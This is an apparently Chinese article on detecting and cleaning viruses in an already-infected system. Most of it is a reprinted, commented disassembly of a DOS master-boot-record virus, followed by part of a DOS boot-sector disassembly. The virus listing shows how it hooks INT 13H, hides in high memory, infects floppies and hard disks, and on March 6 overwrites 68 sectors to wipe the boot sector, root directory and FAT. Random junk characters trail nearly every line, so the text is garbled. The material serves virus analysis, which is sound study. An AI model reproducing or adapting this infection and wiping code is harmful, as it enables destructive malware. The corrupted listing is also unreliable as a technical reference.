近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 >L\>Th{o
?? [n[!RddY
?? 一 、 带毒环境下检测清除病毒的意义 9?VyF'r=
?? ]Iku(<*Ya
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 a3&&7n
?? Q(P'4XCm
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 q/
x(:yol
?? z9@Tg=#i
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 .qjVw?E
?? s0}OsHAj
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 @yBg)1AL
?? 7pB5o2CD0
?? 二 、带毒环境下检测清除病毒的原理 n*tT<
??
2EG`
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 iKy_DV;J
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 '$5.{o`s*1
0!WF,)/T7i
h$#QRH
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " K~j&Q{yws@
病毒体:
5dH}cXs
JMP 01AF ;JMP到01AF 0KW@j>=jK
DB 00 ;病毒标计 zJp}JO
DW 00F5 ;此为搬到高位址后,远程跳转指令
1_D|;/aI
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX QZcdfJck=+
DB 02 ]9xuLJ)
DW 0003 ;此为软盘识别标记,硬盘为0007 '@Zau\xC
DW EC59 ; RUJkfi=$
DW F000 ;INT 13H的原入口 /Iwnl
. >900I4]I
. Cu5fp.OS7
. EXlmIY4
. vvJ{fi
. w"s;R8
XOR AX,AX ;清除AX %M=[h2SN
MOV DS,AX; ;让DS=0000 _l?InNv
CLI ;清I标志积存器 Hzr<i4Y=w9
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 -WDU~VSU
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 ]7qn&(]
MOV SP,AX ;开机时为0000:7CB6 Uu~7+oaQ
STI ;设I标志积存器 <h(KIY9T
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A ^/|agQ7D2
PUSH AX ;用RETF,把程序转到引导或分区表位置 P8tpbdZE-
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 OH` |
c
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 %9,:
MOV AX,[004E] ;取INT 13H的段地址 o,| LO$~
MOV [7C0C],AX ;存到010C {K\l3_=5qb
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 Vej [wY-c
;读写以便传播发作 `Yk~2t"V
#cB=](N
MOV AX,[0413] ;取得内存K数,放在AX 8dg\_H_
DEC AX ; !.(Kpcrg
DEC AX ;减2k内存 hT`kma
MOV [0413],AX ;存回,通常是638K dP>~ExYtm
MOV CL,06 ; _ZM$&6EC
SHL AX,CL ; .Dn.|A
MOV ES,AX ;算出减2K后病毒本体的位址 #6< X
MOV [7C05],AX ;AX存入0105 V$y6=Q<c
z/IA
@
;病毒常用手法将系统高段内存减少以便驻留 #fq%903=
;这样可以免于被其他程序覆盖 ?hpT"N,hF9
\#LkzN8
MOV AX,000E ;病毒拦INT 13H cL31g_u
;ISR起始的偏移量 XCCh*qym
MOV [004C],AX ; 9`83cL
MOV [004E],ES ;设原为病毒的INT 13H F`/-Q>Q
MOV CX,01BE ;病毒长度为1BE VMry$
MOV SI,7C00 ;从JMP 01AF开始 g"k1O
XOR DI,DI ;DI=0 Lk?%B)z
CLD ;清方向标志 Y ^s_v_s
REPZ; |eN#9Bm
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 5a$Q}!6E.Y
CS: ;分区表能载入0000:7C00正常运作 X9W'.s.[Q
JMP FAR [7C03] ;跳到为搬过后的位址 UDjmXQ2,
XOR AX,AX ;清AX ~7!=<MW
MOV ES,AX ;ES=0000 (IlHg^"
INT 13 ;复位磁盘 r57&F`{
PUSH CS ; 1&zvf4
POP DS ;让DS=CS #BB,6E
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 ^?pf.E!F`
MOV BX,7C00 ;读到0000:7C00 m:kXr^!D
MOV CX,[0008] ;硬盘第0道,第7扇区 YX A|1
CMP CX,+07 ;比较是否从硬盘启动 sK)fEx
JNZ 0213 ;不是跳0213 20 <$f
MOV DX,0080 ;第一硬盘C:第零面 _?j66-(
Q
INT 13 ;用INT 13号中断,读 vNMndo!
JMP 023E ;跳023E比较日期,发作或正常开机 ]} D^?g^
MOV CX,[0008] ;软盘0道,第3扇区 3Go/5X/
MOV DX,0100 ;A:的第0面 vrRbUwL!
INT 13 ;INT 13读盘 ZXCq>
JB 023E ;失败跳023E j-l#n&M
PUSH CS #xUX1(
POPES ;让ES=CS ``;.Oy6jS
MOV AX,0201 ; ;^XF;zpg
MOV BX,0200 ; Ban@$uf
MOV CX,0001 ; yyp0GV.x
MOV DX,0080 ; ?vmu,y
INT 13 ;读入C:的分区表到0200,以便下面比较 SM57bN
JB 023E ;失败跳023E }ufzlHD
XOR SI,SI ;清SI 8Zj=:;
CLD ;清方向标志以便比较 N>R\,n|I
LODSW ;载入一个WORD到AX t>hoXn^-
CMP AX,[BX] ;比较有无病毒存在..E9AC 5yOIwzr&Uu
JNZ 0287 ;没有则跳0287传染 t0*kL.
LODSW ;载入一个WORD到AX
fQW1&lFT
CMP AX,[BX+02] ;再次确认..0000 0P{^aSxTP
JNZ 0287 ;没有跳0287 U2v;[ >=]
XOR CX,CX ;清CX
Nk.m$
MOV AH,04 ; 7a$K@iWU
INT 1A ;取得日期 vbt0 G-%Z
CMP DX,0306 ;是否为三月六日 "_LDs(&
JZ 024B ;是跳024B传染 Rz sgPk
RETF ;把程序交还给引导启动完成 v|!u]!JM
;rgg O0Y
步骤4:病毒INT 13代码分析 /{)}y
方法:U 0bG[pp$[
PUSH DS ;首先把要用到积存器 UB5CvM28
PUSH AX ;入栈保存 NCrNlHIF
OR DL,DL ;比较是否为软盘 pUcN-WA
JNZ 002F ;如不是则退出传染 BiFU3FlTf
XOR AX,AX ;AX=0 s ;3k#-w
MOV DS,AX ;数据代段=0 ?*oBevUnCY
TEST BYTE PTR [043F],01 ;比较是否为A盘 M~rN17S
JNZ 002F ;不是则退出 XmZs4~\K$G
POP AX ;将以上保存积存器 s3(mkdXv
POP DS ;弹栈恢复 U0ZT9/4
PUSHF ;压栈标志积存器 *5|;eN
CS: ;以便执行原INT 13 YC!IIE_
CALL FAR [000A] ;执行原INT 13 .<m${yU{3
PUSHF ;再次压栈 _GhP{C$
CALL 0036 ;以便跳转到传染程序 |IcA8[
POPF ;跳转到执行传染 <{ER#}b:O
RETF 0002 ;结束中断调用返回 lEZODc+%Y
POP AX ;恢复 PO*;V<^
POP DS ;堆栈 k.."_4
CS: ;跳转到原正常INT 13 @AB}r1E2
JMP FAR [000A] ;地址执行 CpE LLA<
M]Kxg;
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 tPp9=e2[s
:VkuK@Th`
步骤5:传染过程分析 ;[qA?<GJ
方法:U 8+*
1s7{
对软盘传染过程: v}cTS@0
PUSH AX ;工 ?\Bm>p%+
PUSH BX ;作 p*NKM}
]I
PUSH CX ;寄 c-`'`L^J
PUSH DX ;存 ?[Sac]h
ys
PUSH DS ;器 0~a9gBG
PUSH ES ;入 Y>J$OA:
PUSH SI ;栈 {4F=].!
PUSH DI ;保存 QZh#&Qf;
PUSH CS ;以压/弹栈方式 +g9CklJ
POP DS ;使数据段DS和 Exb?eHO
PUSH CS ;附加段ES均指向 ym_w09
POP ES ;代码段CS La2f]+sV
MOV SI,0004 ;试4次 )%+7"7.
MOV AX,0201 ;设置各 /f*QxNZ,p
MOV BX,0200 ;积存器 }'KHF0
MOV CX,0001 ;为读软盘
vE~>9
XOR DX,DX ;引导扇区做准备 :5'8MU
PUSHF ;压栈标志积存器
|F}6Zv
CALL FAR [000A] ;正常的INT 13调用 4)Bk:K
JNB 0063 ;成功则转判断 ^ g'P
H{68
XOR AX,AX ;不成功复位 5i0vli/L
PUSHF ;磁盘继续读 7DZZdH$Fm
CALL FAR [000A] ;如果4次 YHp]O+c
DEC SI ;均匀不成功 e0"80"D
JNZ 0045 ;则退出跳转 ]lqe,>
JMP 00A6 ;退出传染 APJVD-
XOR SI,SI ;SI=0以便用 !MyCxM6
CLD ;LODSW读入软盘 c]/X
>8;
LODSW ;第1或第2字进行比较 B*@0l:
CMP AX,[BX] ;比较如果不包含病毒标志 F(;=^w
JNZ 0071 ;则跳转写传染 Leu93f2
LODSW ;如果已有标志 &cpqn2Z
CMP AX,[BX+02] ;则退出 L^FQ|?*
JZ 00A6 ;传染子程序 ,
3&DA
MOV AX,0301 ;为写盘准备 Q)/oU\
MOV DH,01 ;如果是360K S'_2o?fs
MOV CL,03 ;则写到1面0道3扇区 TpGnSD
CMP BYTE PTR [BX+15],FD ;比较软盘 C JYpgSr
JZ 0080 ;如果大于360K WHy
r;m3)
MOV CL,0E ;写到1面0道14扇区 gq7l>vT.
MOV [0008],CX ;写病毒标志到软盘 ;u?L>(b
PUSHF ;调用原INT 13 A4tb>OM
CALL FAR [000A] ;进行传染 (|2:^T+
JB 00A6 oWLv-{08
MOV SI,03BE ;以下是将正常 ysH'X95
MOV DI,01BE ;引导扇区从 MqAN~<l [
MOV CX,0021 ;1BE起的21字节内容 'PvOOhm,
CLD ;搬移到病毒程序尾部 01<Ti"
REPZ ;开始复制 a 7>^^?|
MOVSW Vr7L9%/wg
MOV AX,0301 ;写盘功能调用,写一个扇区 I_s* pT
XOR BX,BX ;将病毒程序 4n0Iw I
MOV CX,0001 ;写入软盘引导扇区内 Krd0Gc~\|
XOR DX,DX ;设置为软盘 +zg3/C4 S
PUSHF wZg~k\_lF
CALL FAR [000A] ;执行正常INT 13调用写盘 GK`U<.[c
POP DI ;将 Z [YSET
POP SI ;工 MP|$+yuR~
POP ES ;作 s?Z{LWZ@
POP DS ;寄 XS(Q)\"
POP DX ;存 .)c+gyaQ
POP CX ;器 I]-"Tw
POP BX ;退 l+#uQo6cqQ
POP AX ;栈 STL+tLJ
RET ;返回调用处 GUps\:ss
对硬盘传染过程: v;nnr0;
MOV CX,0007 ;第7扇区 U?xa^QVhj
MOV [0008],CX ;此处为硬盘引导标记 =/+f3
MOV AX,301 ;写功能调用 8dLK5"_3
MOV DX,0080 ;设置为硬盘 Ez+8B|0P
INT 13 ;将正常引导扇区写到0面0道7扇区内 NydF'N_1
JB 13E ;失败则转 yIu_DFq%
MOV SI,03BE ;原分区表地址 a_\t(U
MOV DI,01BE ;目标地址 Y#zHw<<E
MOV CX,0021 ;整个分区表 RZ0+Uu/J
REPNZ YS bS.tq
MOVSW ;开始复制 Q%QIr
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 ?$6(@>`f&t
;这样在分析着查看硬盘分区信息时仍能看到该部分 ] 1s6=
;内容,以次来麻痹分析者 Xd@ d$
MOV AX,0301 ;准备写病毒提进硬盘 .k"unclT0
XOR BX,BX ;病毒体位置 ,: Ij@u>)
INC CL ;第一扇区 6Zx)L|B
INT 13 ;开始写盘传染 )@],0yL
JMP 013E ;转到13E处判断是否为3月6日,是则发作 f<;eNN
Oh3A?!y#
步骤6:破坏过程分析 !8I80:e_~
方法:U !>?*gc.<
主要分析对硬盘数据破坏: fp?/Dg"49.
. C.RXQ`-P}
. 9*S9~
. 5i-VnG
. ig ^x%!;
. k !V@Q!>,
MOV DL,80 K2gF;(
MOV BYTE PTR[0007],04 +W"DN5UV
;准备写硬盘 l^2m7 7)
MOV AL,11 ;写17个扇区 v+~O\v5Q
MOV BX,5000 "I
QM4:
MOV ES,BX ;从内存ES:5000中处开始写 `h~-
INT 13 ;残不人睹 bR<XQHl
JNB 0179 ;成功转179继续写 fwi
-
XOR AH,AH %-L
T56T
INT 13 ;不成功复位磁盘继续 ~?Zm3zOCc2
INC DH ;使写操作磁头加1继续? ;+*/YTkC+P
CMP DH,[0007] ;比较是否小于0007单元值 #'97mg
JB 0150 ;是则返回开始处继续写 !8|?0>3)
XOR DH,DH ;DH=0 m$VCCDv
INC CH ;再加扇区
t;}`~B
JMP 0150 ;反回继续写 5nXmaj
;以上操作实际上是对硬盘执行4次写操作,每次17个扇区 "}2I0tM
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录 8M,$|\U
;和文件分配表。 CQs,G8\/
yeLd,M/I
引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次 qG3MyK%O\
读盘的时将自身写入磁盘。 IM_SZs
引导过程如下: EKUiX#p:M
1>调整堆栈位置 +o]J0Gu
2>修改并用修改后的磁盘参数表来复位磁盘系统 _FCg5F2U
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置 q}C;~nMD
4>读入根目录表的首扇区 Ap> H-/C
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS 63VgQ
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处 sj&1I.@,>
7>跳到0000:0700H处执行IO.SYS,引导完毕 Oo/@A_JO@
003E FA CLI L-Mf{z
003F 33C0 XOR AX,AX -PaR&0Tt
0041 8ED0 MOV SS,AX !O4)YM
0041 8ED0 MOV SS,AX q!WiX|P
0043 BC007C MOV SP,7C00 ; 初始化堆栈 P:UR:y([
0046 16 PUSH SS =3=8oF x8
0047 07 POP ES ;(ES)=0000H bUe6f,8,
0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H 7
b{y
004B 36 SS: ;(SS)=0000H QtLd(&
!v
004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI WH<\f|xR
004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表 'jYKfq~_cJ
004F 56 PUSH SI ;取到后压入堆栈中保存 e\}'i-
0050 16 PUSH SS l - ~PX
0051 53 PUSH BX ;保存地址0000:0078H |<#yXSi
0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推 [j?<&